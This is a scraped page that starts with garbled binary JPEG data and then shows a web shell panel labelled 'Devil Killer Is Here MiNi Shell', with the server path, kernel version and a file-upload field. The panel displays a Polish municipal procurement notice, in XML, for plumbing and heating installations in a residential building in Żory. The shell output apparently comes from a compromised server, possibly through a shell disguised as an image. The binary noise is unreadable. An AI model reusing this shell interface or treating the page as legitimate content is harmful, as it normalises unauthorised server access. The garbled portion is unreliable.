JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/temp/20170131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/temp/20170131/16743_2017.xml

<?xml version="1.0" encoding="utf-8"?><ZP-400><biuletyn>2017</biuletyn><pozycja>16743</pozycja><data_publikacji>2017-01-31</data_publikacji><nazwa>Zakłady Techniki Komunalnej spółka z ograniczoną odpowiedzialnością</nazwa><ulica>ul. Okrężna</ulica><nr_domu>5</nr_domu><nr_miesz></nr_miesz><miejscowosc>Żory</miejscowosc><kod_poczt>44240 </kod_poczt><panstwo>Polska</panstwo><wojewodztwo>śląskie</wojewodztwo><tel>324 356 880</tel><fax>324 356 920</fax><email>sekretariat@ztkzory.pl</email><internet></internet><adres_strony_internetowej_narzedzia></adres_strony_internetowej_narzedzia><adres_strony_url>http://www.bip.ztkzory.pl/index.php?id=20</adres_strony_url><podmiot2c></podmiot2c><regon>24090821600000</regon><e_mail></e_mail><ogloszenie>Ogłoszenie o zamówieniu</ogloszenie><czy_obowiazkowa>N</czy_obowiazkowa><zamieszczanie_obowiazkowe>N</zamieszczanie_obowiazkowe><nazwa_projektu_programu></nazwa_projektu_programu><czy_ubiegac_zaklady_pracy /><minimalny_procent_zatrudnienia></minimalny_procent_zatrudnienia><czy_przeprowadza_centralny_zamawiajacy /><czy_przeprowadza_podmiot_zamawiajacy_powierzyl /><zamawiajacy_powierzyl></zamawiajacy_powierzyl><czy_przeprowadza_wapolnie /><przeprowadza_wapolnie_podmiot1></przeprowadza_wapolnie_podmiot1><przeprowadza_wapolnie_podmiot2></przeprowadza_wapolnie_podmiot2><czy_przeprowadza_zamawiajacy_z_eu /><postepowanie_wspolne_tresc></postepowanie_wspolne_tresc><informacje_dodatkowe_zamawiajacy></informacje_dodatkowe_zamawiajacy><dotyczy>1</dotyczy><adres_dyn_zak></adres_dyn_zak><rodzaj_zam>inny: </rodzaj_zam><wspolne_udzielanie_zamowienia></wspolne_udzielanie_zamowienia><czy_dostep_dokumentow_zamowienia>T</czy_dostep_dokumentow_zamowienia><dostep_dokumentow_zamowienia>http://www.bip.ztkzory.pl/index.php?id=20</dostep_dokumentow_zamowienia><czy_zamieszczona_bedzie_specyfikacja>T</czy_zamieszczona_bedzie_specyfikacja><zamieszczona_bedzie_specyfikacja>http://www.bip.ztkzory.pl/index.php?id=20</zamieszczona_bedzie_specyfikacja><czy_dostep_do_dokumentow_ograniczony /><czy_wymagane_przeslanie_ofert>T</czy_wymagane_przeslanie_ofert><wymagane_przeslanie_ofert_inny>w formie pisemnej za pomocą operatora pocztowego, osobiście lub za pośrednictwem posłańca</wymagane_przeslanie_ofert_inny><czy_podzielone_na_czesci>N</czy_podzielone_na_czesci><oferty_lub_wnioski /><maksymalna_liczba_czesci></maksymalna_liczba_czesci><zastrezega_prawo_grup_czesci></zastrezega_prawo_grup_czesci><maksymalna_liczba_czesci_jednemu_wykonawcy></maksymalna_liczba_czesci_jednemu_wykonawcy><dostep_do_dokumentow_ograniczony></dostep_do_dokumentow_ograniczony><czy_oferty_wnioski_dostepne /><oferty_wnioski_dostepne></oferty_wnioski_dostepne><czy_dopuszczone_wymagane_przeslanie_ofert /><dopuszczone_wymagane_przeslanie_ofert_inny></dopuszczone_wymagane_przeslanie_ofert_inny><dopuszczone_wymagane_przeslanie_ofert_adres>Zakłady Techniki Komunalnej Sp. z o.o, 44-240 Żory, ul. Okrężna 5 sekretariat I piętro</dopuszczone_wymagane_przeslanie_ofert_adres><czy_komunikacja_elektroniczna_wymaga /><komunikacja_elektroniczna_wymaga></komunikacja_elektroniczna_wymaga><wymagania_dotyczace_rejestracji_wyk_aukcja></wymagania_dotyczace_rejestracji_wyk_aukcja><nazwa_zamowienia>Budowa instalacji wewnętrznych wodnych, kanalizacyjnych, centralnego ogrzewania dla budynku B4”</nazwa_zamowienia><numer_referencyjny>ZP/3/2017</numer_referencyjny><czy_dialog_techniczny /><rodz_zam>B</rodz_zam><przedmiot_zam>1)	Przedmiotem zamówienia jest budowa instalacji wewnętrznych wodnych, kanalizacyjnych, centralnego ogrzewania dla budowy budynku wielorodzinnego nr 4 zlokalizowanego w Żorach, przy Alei Zjednoczonej Europy.

Inwestycja jest zlokalizowana na działkach nr 3091/186, 3093/186, 3095/186 (powstałych z podziału działek nr 3079/186 oraz 3083/183 decyzją Prezydenta Miasta Żory GKK-RGK.6831.76.2016.EM z dnia 30.06.2016) i na działkach 3077/186, 3078/186, 3082/183, 2573/187.

Przedmiot zamówienia stanowią instalacje wewnętrzne wodne, kanalizacyjne, centralnego ogrzewania dla budowanego budynku nr 4:

Budynek mieszkalny wielorodzinny nr 4:
	budynek mieszkalny wielorodzinny, od 4 do 7 kondygnacji nadziemnych, z przeznaczeniem w całości na funkcję mieszkaniową, oraz I kondygnacją podziemną, w której zlokalizowano garaże podziemne, pomieszczenia techniczne i komórki lokatorskie.
Parametry charakterystyczne: powierzchnia zabudowy: 1 919,40m2, powierzchnia całkowita: 17 455,74m2, powierzchnia użytkowa mieszkań: 7 707,20m2, kubatura brutto: 60 787,49m3, ilość kondygnacji mieszkalnych: 4-7, ilość mieszkań 135.

W ramach powyższego przedmiotu zamówienia, Zamawiający przewiduje do wykonania:
a.	Budowę wewnętrznych instalacji, w tym:
	instalacje wody zimnej i ciepłej,
	kanalizacji sanitarnej i deszczowej;
	centralnego ogrzewania, 
UWAGA: Zamawiający wyłącza z zakresu zamówienia wykonanie części instalacji prowadzonych w płycie fundamentowej i pod płytą fundamentową. 
b.	Zakres robót uzupełniających, w tym:
	wykonanie prób szczelności instalacji wraz z przygotowaniem protokołów,
	wykonanie badania jakości wody pod kątem bakteriologicznym i fizyko-chemicznym.

Szczegółowy zakres prac precyzują: dokumentacja projektowa, tj. projekt budowlany, decyzja o pozwoleniu na budowę, projekty wykonawcze, specyfikacje techniczne wykonania i odbioru robót, przedmiary robót (przedmiary robót należy traktować jako element pomocniczy).

2)	Wykonawca w cenie ofertowej jest zobowiązany do wykonania wszystkich czynności, które są związane z realizacją przedmiotu zamówienia, a wynikających z: projektu budowlanego, decyzji o pozwoleniu na budowę, projektów wykonawczych, specyfikacji technicznej wykonania i odbioru robót, dodatkowych wytycznych i wymagań Zamawiającego oraz obowiązujących w tym zakresie przepisów, norm i zasad współczesnej wiedzy technicznej i sztuki budowlanej, przepisów bhp, p.poż. i ochrony środowiska.
Zamawiający zaleca dokonanie wizji lokalnej przez Wykonawcę terenu inwestycji ze szczególnym zwróceniem uwagi na nieruchomości przyległe w tym: budynki mieszkalne, budynki usługowo – handlowe, chodniki, drogi oraz ogrodzenia. 
W wyniku ewentualnego zniszczenia lub uszkodzenia obiektów oraz nawierzchni Wykonawca zobowiązuje się je przywrócić do stanu pierwotnego lub pokryć stratę.

3)	Wymagania Zamawiającego, które Wykonawca zobowiązany jest wykonać w ramach niniejszego zadania :

1.	Zamawiający wymaga wykonania robót budowlanych stanowiących przedmiot zamówienia w pełnym zakresie zgodnie z dokumentacją, obowiązującymi przepisami i normami, zasadami współczesnej wiedzy technicznej i sztuki budowlanej, przepisami bhp i p.poż., ochrony środowiska, postanowieniami niniejszej SIWZ z załącznikami.
2.	Od dnia podpisania umowy pozostawanie w pełnej gotowości do bezzwłocznego przejęcia frontu robót.
3.	Powierzenie funkcji kierowników robót branżowych z wymogiem stałej obecności  w trakcie prowadzenia robót branżowych. Kierownicy robót branżowych muszą posiadać stosowne uprawnienia budowlane. Powyższe zdarzenie musi być wpisane do dziennika budowy. 
4.	Zmiana kierowników robót, w trakcie realizacji przedmiotu zamówienia, musi być uzasadniona przez Wykonawcę na piśmie i wymaga pisemnego zaakceptowania przez Zamawiającego. Zamawiający zaakceptuje taką zmianę w terminie 7 dni od daty przedłożenia propozycji wyłącznie wtedy, gdy kwalifikacje wskazanej osoby będą nie mniejsze niż wymagane w niniejszym postępowaniu o udzielenie zamówienia publicznego. Wykonawca musi przedłożyć Zamawiającemu propozycję zmiany, nie później niż 7 dni przed planowanym skierowaniem do kierowania robót wskazanej osoby. Jakakolwiek przerwa w realizacji przedmiotu zamówienia wynikająca z braku kierownictwa robót branżowych będzie traktowana jako przerwa wynikła z przyczyn zależnych od Wykonawcy i nie może stanowić podstawy do zmiany terminu zakończenia robót.
5.	Zaakceptowana przez Zamawiającego zmiana osób pełniących funkcję kierowników robót winna być potwierdzona wpisem do dziennika budowy i nie będzie wymagała aneksu do umowy.
6.	Wykonanie harmonogramu rzeczowo-finansowego i przedstawienie do akceptacji Zamawiającego w terminie 5 dni od dnia podpisania umowy. Przedmiot zamówienia będzie realizowany zgodnie z harmonogramem rzeczowo-finansowym.
7.	Pełnienie funkcji koordynacyjnych w stosunku do podwykonawców.
8.	Uczestnictwo w naradach koordynacyjnych, zwoływanych przez Zamawiającego.
9.	Utrzymywanie na bieżąco porządku w rejonie prowadzenia robót oraz na drogach dojazdowych; w przypadku zaniechania powyższych obowiązków przez Wykonawcę, Zamawiającemu przysługuje prawo, bez dodatkowego wezwania Wykonawcy, do wykonania powyższych czynności na koszt i ryzyko Wykonawcy oraz potrącenia należności z tego tytułu z wynagrodzenia Wykonawcy. Wykonawca odpowiada za ochronę środowiska w rejonie prowadzenia robót, podejmuje odpowiednie środki w celu zabezpieczenia dróg przed zniszczeniem i zanieczyszczeniem spowodowanym jego środkami transportowymi; po zakończeniu robót przywraca je do stanu pierwotnego.
10.	Przekazywanie gruzu i odpadów powstałych w trakcie robót do odbiorcy odpadu zgodnie z ustawą o odpadach z dnia 14 grudnia 2012 roku (Dz. U. z 2013r. poz. 21) lub wykorzystanie we własnym zakresie zgodnie z posiadanym zezwoleniem. Przekazanie odpadów należy udokumentować pisemnie.  
11.	Zabezpieczenie miejsca prowadzenia robót przed dostępem osób trzecich.
12.	Zapewnienie bezpiecznego dojazdu i dojścia do sąsiadujących obiektów.
13.	Zapewnienie przestrzegania przepisów bhp w trakcie prowadzenia robót. 
14.	Zainstalowanie na własny koszt podliczników wody i energii elektrycznej dla potrzeb prowadzonych robót, oraz ponoszenia kosztów zużycia wody i energii elektrycznej w okresie realizacji robót objętych zamówieniem.
15.	Powiadomienie Zamawiającego o gotowości do odbioru robót zanikowych z wyprzedzeniem co najmniej 3 dni roboczych.
16.	Powiadomienie Zamawiającego o gotowości do częściowego odbioru robót z wyprzedzeniem 7 dni roboczych do planowanego terminu odbioru (odbiór częściowy robót jest dokonywany w celu prowadzenia częściowych rozliczeń za wykonane roboty). W tym terminie Wykonawca dostarczy, do akceptacji Kierownika Projektu, Kierownika Budowy i Inspektorów Nadzoru Inwestorskiego, wykaz robót wykonanych częściowo, sporządzony na podstawie obmiaru rzeczywiście wykonanych robót, wraz ze wskazaniem części robót wykonanych przez Podwykonawców. Dokonanie odbioru częściowego następuje, w terminie 7 dni roboczych, protokołem odbioru częściowego na podstawie sporządzonego przez Wykonawcę, i zaakceptowanego przez Kierownika Projektu, Kierownika Budowy i Inspektorów Nadzoru Inwestorskiego, wykazu robót wykonanych częściowo.
17.	Informowanie Zamawiającego - w formie pisemnej - o wszelkich problemach i okolicznościach, które mogą wpłynąć na jakość i terminowość wykonywanych robót.
18.	Wszystkie materiały budowlane w ramach umowy zabezpiecza Wykonawca.
19.	Stosowanie wyłącznie nowych materiałów budowlanych najwyższej jakości z punktu widzenia rodzaju i funkcji obiektu budowlanego będącego przedmiotem zamówienia, dopuszczonych do stosowania w budownictwie, zaopatrzonych w wymagane aprobaty i certyfikaty, nieuszkodzonych, wolnych od praw i ciężarów osób trzecich, używanie ich zgodnie ze specyfikacją techniczną producenta, w warunkach odpowiednich do wykonania prac z użyciem tych materiałów.
20.	Wszelkie materiały Wykonawca będzie zobowiązany uzgadniać każdorazowo z Zamawiającym.
21.	Wykonawca, na własny koszt, przeprowadzi analizę jakości wody w akredytowanym laboratorium dla wykonanych instalacji c.w.u. oraz wody pitnej, zgodnie z obowiązującymi przepisami i normami. Materiały użyte do wykonania instalacji c.w.u. oraz instalacji wody pitnej mają posiadać aktualny atest PZH na kontakt z wodą pitną.
22.	Wykonawca, na własny koszt, wykona pomiary wydajności hydrantów i dołączy do dokumentacji odbiorowej protokół wydajności hydrantów ppoż.
23.	Dokonywanie wpisów w Dzienniku Budowy przez kierowników robót branżowych. 
24.	Ponoszenie opłat, które okażą się niezbędne do prowadzenia robót i prawidłowej realizacji przedmiotu zamówienia (tj. opłat za wszelkie uzgodnienia i opinie wynikające z obowiązujących przepisów).
25.	Wszelkie koszty związane z opracowaniami, odbiorami i badaniami pokrywa Wykonawca.
26.	Wykonawca jest zobowiązany do przeprowadzenia, z udziałem właścicieli sieci, odbiorów przyłączy, układów pomiarowych wraz z włączeniem do eksploatacji.
27.	Wykonawca przeszkoli osoby wskazane przez Zamawiającego w zakresie obsługi i eksploatacji zamontowanych urządzeń.
28.	Wykonawca zobowiązany jest do przekazania Zamawiającemu, w języku polskim, instrukcji użytkowania i konserwacji urządzeń, określających procedury i zasady wykonywania czynności niezbędnych przy eksploatacji i instalacji.
29.	Wykonawca do odbioru końcowego dostarczy Zamawiającemu komplet dokumentów odbiorowych i rozliczeniowych, w tym m.in.: dokumentów pozwalających na stwierdzenie, że wszystkie zabudowane materiały posiadają dopuszczenie do zastosowania w budownictwie (łącznie z niezbędnymi atestami, certyfikatami i deklaracjami zgodności), protokoły z badań i sprawdzeń, protokoły, protokoły odbiorów częściowych i zanikowych, oświadczenia kierowników robót, dokumentację fotograficzną.
30.	Dokumentację odbiorową dostarczy na 14 dni przed zgłoszeniem gotowości do odbioru końcowego, w formie papierowej w 2 egz. oraz 1 egz. w wersji elektronicznej.
31.	Doprowadzenie do stanu pierwotnego terenu zaplecza budowy po zakończeniu robót z ewentualnym uwzględnieniem stanu określonego w projekcie zagospodarowania terenu.
32.	Wykonawca jest zobowiązany do usunięcia na własny koszt wszelkich uszkodzeń przyległego terenu, które mogą powstać w wyniku przeprowadzonych prac. W związku z tym przed rozpoczęciem robót przeprowadzi z przedstawicielem Zamawiającego i Użytkownika przegląd „zerowy” terenu przyległego wraz ze sporządzeniem dokumentacji (w tym dokumentacji fotograficznej).
33.	Wykonawca zobowiązany jest do powiadomienia na piśmie Zamawiającego o zakończeniu robót.

4)	Jeżeli w dokumentacji przetargowej element przedmiotu zamówienia został wskazany poprzez znak towarowy, patent lub pochodzenie, źródło lub szczególny proces lub opisano element przedmiotu zamówienia za pomocą norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych,                    o których mowa w art. 30 ust. 1 i ust.3 ustawy Pzp, ewentualne wskazania na takie elementy przedmiotu zamówienia należy odczytywać z wyrazami „lub równoważny”. Zamawiający dopuszcza w takim przypadku oferowanie elementów równoważnych pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w ww. dokumentacji przetargowej.

5)	W związku z wymaganiami Ustawy Prawo ochrony środowiska oraz zapisami „Programu Ochrony Powietrza dla stref województwa śląskiego, w których stwierdzone zostały ponadnormatywne poziomy substancji w powietrzu”, Zamawiający informuje, że w trakcie prowadzenia prac budowlanych będzie wymagał zastosowania technologii wykonania robót, które ograniczają do minimum pylenie stosowanych materiałów budowlanych oraz są nieuciążliwe dla środowiska.
W związku z powyższym Wykonawca w trakcie prowadzenia prac budowlanych zobowiązany jest do:
•	zraszania wodą terenu prowadzenia robót w okresach suszy,
•	stosowania zabezpieczenia pylastych materiałów sypkich przed rozwiewaniem (przykrycie plandekami, zraszanie),
•	transportu materiałów sypkich samochodami wyposażonymi w plandeki ograniczające pylenie przewożonych materiałów,
•	stosowanie gotowych mieszanek budowlanych przygotowywanych w wytwórniach,
Zamawiający będzie prowadził monitoring pojazdów obsługujących budowę pod kątem ograniczenia zanieczyszczenia dróg.
W przypadku stwierdzenia uchybień, które zagrażają środowisku naturalnemu i są niezgodne z przepisami polskiego prawa i powyższymi zapisami, Zamawiający wstrzyma prowadzenie robót.
Przypomina się również, że:
•	Wykonawca jest zobowiązany do używania sprzętu i maszyn, które są zgodne                          z normami ochrony środowiska i przepisami dotyczącymi ich użytkowania;
•	organizacja placu budowy i prowadzenie prac budowlanych nie mogą zagrażać środowisku naturalnemu.

6)	Wykonawca ma prawo podpisać umowę o podwykonawstwo. Zamawiający żąda wskazania przez Wykonawcę części zamówienia, których wykonanie zamierza powierzyć Podwykonawcom i podania przez Wykonawcę firm Podwykonawców.

Jeżeli powierzenie Podwykonawcy wykonania części zamówienia na roboty budowlane lub usługi następuje w trakcie jego realizacji, Wykonawca na żądanie Zamawiającego przedstawia oświadczenie, o którym mowa w art. 25a ust. 1, lub oświadczenia lub dokumenty potwierdzające brak podstaw wykluczenia wobec tego Podwykonawcy. 
Jeżeli Zamawiający stwierdzi, że wobec danego Podwykonawcy zachodzą podstawy wykluczenia, Wykonawca obowiązany jest zastąpić tego Podwykonawcę lub zrezygnować z powierzenia wykonania części zamówienia Podwykonawcy. 

Przepisy art. 36ba ust. 1 i 2 ustawy Pzp stosuje się wobec dalszych Podwykonawców.
</przedmiot_zam><cpv1c>45000000-7</cpv1c><cpv2c>45300000-0</cpv2c><okres2c>30/06/2018</okres2c><szacunkowa_wart_zam_calosc>1900000.00</szacunkowa_wart_zam_calosc><waluta_calosc>PLN</waluta_calosc><czy_przewiduje_udzielenie_zamowien_67>N</czy_przewiduje_udzielenie_zamowien_67><czy_przewiduje_udzielenie_zamowien_67_tekst></czy_przewiduje_udzielenie_zamowien_67_tekst><czy_czesci /><czy_czesci_wymaga /><ilosc_czesci></ilosc_czesci><ilosc_czesci_max></ilosc_czesci_max><czy_wariant /><czy_uzup /><zam_uzupelniajace></zam_uzupelniajace><czas>
        O
      </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_zak></data_zak><ii_2_lub_temp></ii_2_lub_temp><informacje_na_temat_katalogow>Wartość szacunkowa udzielanego zamówienia wynosi 1.900.000 zł netto. Zamówienie to stanowi część większego zamówienia polegającego na budowie zespołu budynków wielorodzinnych. Ogłoszenie o zamówieniu ze względu na całkowitą wartość budowy zostało opublikowane e dzienniku unii europejskiej pod nr 2017/S019-031061</informacje_na_temat_katalogow><okreslenie_warunkow>Zamawiający nie opisuje żadnych wymagań których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</okreslenie_warunkow><informacje_dodatkowe_okreslenie_warunkow></informacje_dodatkowe_okreslenie_warunkow><sytuacja_finansowa_okreslenie_warunkow>Zamawiający uzna warunek za spełniony jeżeli Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 500.000 zł.</sytuacja_finansowa_okreslenie_warunkow><sytuacja_finansowa_informacje_dodatkowe></sytuacja_finansowa_informacje_dodatkowe><zdolnosc_techniczna_okreslenie_warunkow>Zamawiający uzna warunek  za spełniony jeżeli:

a)Wykonawca w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał 1 robotę budowlaną o wartości nie mniejszej niż 500 000 zł brutto, polegającą na budowie instalacji wewnętrznych wodno-kanalizacyjnych lub centralnego ogrzewania oraz załączy dowody określające czy te roboty budowlane zostały wykonane należycie, w szczególności informacje o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.

b)Wykonawca skieruje do realizacji zamówienia osoby odpowiedzialne za: 

a.Kierowanie robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (uprawnienia w zakresie kierowania, nadzorowania i kontrolowania budowy bez ograniczeń) - min. 1 osoba,
wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nich czynności, oraz informacją o podstawie do dysponowania tymi osobami. 

Przez uprawnienia „bez ograniczeń” wydane pod rządami aktualnie obowiązujących przepisów rozumie się uprawnienia w zakresie określonym przez te przepisy, natomiast uprawnienia wydane uprzednio mogą zawierać ograniczenia występujące ówcześnie w porządku prawno-administracyjnym pod warunkiem, że nie są to ograniczenia odpowiadające dokładnie ograniczeniom obecnym (kubaturowym), lub ograniczenia te nie są ograniczeniami uniemożliwiającymi posiadającej je osobie sprawowanie funkcji technicznych w budownictwie w zakresie umożliwiającym wykonanie prac objętych przedmiotem zamówienia.

W przypadku osób posiadających uprawnienia wydane poza terytorium Rzeczpospolitej Polskiej wymaga się aby osoby te spełniały odpowiednie warunki opisane w art. 12a ustawy Prawo budowlane. Zamawiający uzna uprawnienia zdobyte na podstawie przepisów obowiązujących przed dniem wejścia w życie ustawy Prawo budowlane oraz właściwych aktów wykonawczych do ustawy – w oparciu o art. 104 ustawy z dnia 7 lipca 1994r. – Prawo budowlane (Dz. U. z 2003r. Nr 207, poz. 2016 ze zmianami).
</zdolnosc_techniczna_okreslenie_warunkow><zdolnosc_techniczna_informacje_dodatkowe></zdolnosc_techniczna_informacje_dodatkowe><czy_zdolnosc_techniczna_wymaga_wykonawcow>T</czy_zdolnosc_techniczna_wymaga_wykonawcow><czy_zamawiajacy_przewiduje_wykluczenie>T</czy_zamawiajacy_przewiduje_wykluczenie><art_24_ust_5_pkt_1>T</art_24_ust_5_pkt_1><art_24_ust_5_pkt_2>T</art_24_ust_5_pkt_2><art_24_ust_5_pkt_3>T</art_24_ust_5_pkt_3><art_24_ust_5_pkt_4>T</art_24_ust_5_pkt_4><art_24_ust_5_pkt_5>T</art_24_ust_5_pkt_5><art_24_ust_5_pkt_6>T</art_24_ust_5_pkt_6><art_24_ust_5_pkt_7>T</art_24_ust_5_pkt_7><art_24_ust_5_pkt_8>T</art_24_ust_5_pkt_8><czy_oswiadczenie_niepodleganiu_wykluczenia /><czy_oswiadczenie_spelnienie_kryteriow /><zaliczka /><uprawnienie></uprawnienie><wiedza></wiedza><potencjal></potencjal><zdolne></zdolne><sytuacja></sytuacja><sprawozdanie_calosc></sprawozdanie_calosc><lata_obrotowe></lata_obrotowe><oswiadczenie_potwierdzenia_1 /><oswiadczenie_potwierdzenia_2 /><oswiadczenie_potwierdzenia_3 /><oswiadczenie_potwierdzenia_4 /><oswiadczenie_potwierdzenia_5 /><oswiadczenie_potwierdzenia_6 /><oswiadczenie_potwierdzenia_7 /><oswiadczenie_potwierdzenia_8 /><oswiadczenie_potwierdzenia_9 /><oswiadczenie_potwierdzenia_10 /><oswiadczenie_wykluczenia_1 /><oswiadczenie_wykluczenia_2 /><oswiadczenie_wykluczenia_3 /><oswiadczenie_wykluczenia_4 /><oswiadczenie_wykluczenia_5 /><oswiadczenie_wykluczenia_6 /><oswiadczenie_wykluczenia_7 /><dok_podm_zag_1 /><dok_podm_zag_2 /><dok_podm_zag_3 /><dok_podm_zag_4 /><dok_potw_1 /><dok_potw_2 /><dok_potw_3 /><dok_potw_4 /><dok_potw_5 /><dok_potw_6 /><inne_dok_potw></inne_dok_potw><inne_dokumenty></inne_dokumenty><niepelnosprawne /><oswiadczenie_przedlozyc /><inne_dokumenty></inne_dokumenty><wykaz_dokumentow_zaswiadczen>Oświadczenie Wykonawca zobowiązany jest złożyć w formie jednolitego dokumentu (JEDZ) sporządzonego zgodnie z wzorem standardowego formularza określonego w rozporządzeniu wykonawczym Komisji Europejskiej wydanym na podstawie art. 59 ust. 2 dyrektywy 2014/24/UE, zwanego dalej „jednolitym dokumentem”. Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Po przeprowadzeniu wstępnej oceny Wykonawcy, którego oferta została oceniona jako najkorzystniejsza, Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 10 dni, terminie aktualnych na dzień złożenia oświadczeń 